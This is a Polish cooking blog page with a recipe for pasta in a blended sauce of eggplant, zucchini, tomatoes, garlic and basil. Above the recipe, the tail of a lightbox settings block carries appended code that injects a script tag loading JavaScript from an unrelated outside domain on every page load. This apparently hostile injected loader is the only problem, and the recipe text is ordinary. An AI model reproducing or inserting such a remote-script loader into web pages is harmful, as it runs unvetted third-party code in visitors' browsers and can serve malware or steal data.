, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Makaron z sosem: bakłażan, cukinia, pomidor, bazylia

Wydrukuj artykuł Wydrukuj artykuł

makaron z sosem: bakłażan, cukinia, pomidor, bazylia

Takie danie bardzo dobrze „sprzedaje się” na talerzu. Makaron, biała mozzarella zawsze pochłaniane przez moje dzieci z wielką ochotą. Kolor sosu też nie budzi podejrzeń :)

Składniki (w przybliżeniu):

  • bakłażan
  • cukinia
  • 4 duże pomidory
  • sól, pieprz
  • 2 ząbki czosnku
  • świeża bazylia
  • 2 łyżki oliwy

Przygotowanie:

Bakłażan i cukinię przygotować tak jak w przepisie Zapiekane: bakłażany, cukinia… następnie pokroić na kawałki i przełożyć do wysokiego naczynia, dodać posiekaną, świeżą bazylię.

Pomidory sparzyć, obrać ze skórki i pokroić w kostkę. Na patelni rozgrzać oliwę dodać pokrojony w plasterki czosnek, chwilę podsmażyć, dodać pomidory. Przykryć i podgrzewać około 10 min. Następnie dodać zawartość patelni  do bakłażana i cukinii – całość doprawić solą, pieprzem i zmiksować.

Podawać np. z makaronem i mozzarellą.

 

Kategoria: Bez kategorii Komentarz »


Skomentuj...



Początek strony